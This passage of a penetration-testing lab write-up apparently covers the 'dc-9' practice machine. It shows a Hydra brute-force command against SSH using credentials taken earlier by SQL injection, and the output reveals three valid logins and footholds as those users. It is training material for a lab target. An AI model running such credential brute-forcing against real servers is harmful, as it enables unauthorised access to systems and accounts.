Brute Force Attack
A total of 17 credential has been exfiltrated from the SQL injection. Validating them against the target SSH server.
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ hydra -L ./users.txt -P ./passwords.txt -I -t 64 ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-03 00:49:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 289 login tries (l:17/p:17), ~5 tries per task
[DATA] attacking ssh://192.168.207.209:22/
[22][ssh] host: 192.168.207.209 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.207.209 login: janitor password: Ilovepeepee
[22][ssh] host: 192.168.207.209 login: chandlerb password: UrAG0D!
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-07-03 00:50:00
3 valid credentials identified;
joeyt
:Passw0rd
janitor
:Ilovepeepee
chandlerb
:UrAG0D!
SSH
Initial Foothold established to the
dc-9
(192.168.207.209
) host as the joeyt
user via SSH
Initial Foothold established to the
dc-9
(192.168.207.209
) host as the janitor
user via SSH
Initial Foothold established to the
dc-9
(192.168.207.209
) host as the chandlerb
user via SSH